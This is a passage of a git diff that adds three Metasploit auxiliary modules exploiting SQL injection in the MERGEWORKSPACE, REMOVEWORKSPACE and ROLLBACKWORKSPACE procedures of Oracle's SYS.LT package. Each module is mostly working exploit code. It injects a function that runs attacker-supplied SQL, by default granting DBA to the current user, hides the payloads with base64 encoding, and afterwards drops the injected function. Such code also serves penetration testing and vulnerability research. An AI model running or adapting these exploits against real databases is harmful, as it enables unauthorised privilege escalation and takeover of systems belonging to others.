prepare_exec(cursor) + rescue => e + return + end + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb new file mode 100644 index 0000000000..e310efc34f --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.MERGEWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the MERGEWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], + [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ] + + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = %Q| + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + package2 = %Q| + BEGIN + SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) + tres = Rex::Text.encode_base64(package2) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + | + + clean = "DROP FUNCTION #{cruft}" + + # Try first, if it's good.. keep doing the dance. + print_status("Attempting sql injection on SYS.LT.MERGEWORKSPACE...") + begin + prepare_exec(sql) + rescue => e + return + end + + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb new file mode 100644 index 0000000000..4e6646fa2d --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -0,0 +1,103 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.REMOVEWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the REMOVEWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'Sh2kerr ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-3984' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], + + ], + 'DisclosureDate' => 'Jan 2009')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = %Q| + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + package2 = %Q| + BEGIN + SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) + tres = Rex::Text.encode_base64(package2) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + | + + clean = "DROP FUNCTION #{cruft}" + + # Try first, if it's good.. keep doing the dance. + print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...") + begin + prepare_exec(sql) + rescue => e + return + end + + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb new file mode 100644 index 0000000000..72b29a40e9 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -0,0 +1,100 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.ROLLBACKWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the ROLLBACKWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2009-0978' ], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ], + ], + 'DisclosureDate' => 'May 4 2009')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = %Q| + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + package2 = %Q| + BEGIN + SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) + tres = Rex::Text.encode_base64(package2) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + | + + clean = "DROP FUNCTION #{cruft}" + + print_status("Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...") + begin + prepare_exec(sql) + rescue => e + return + end + + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + end + +end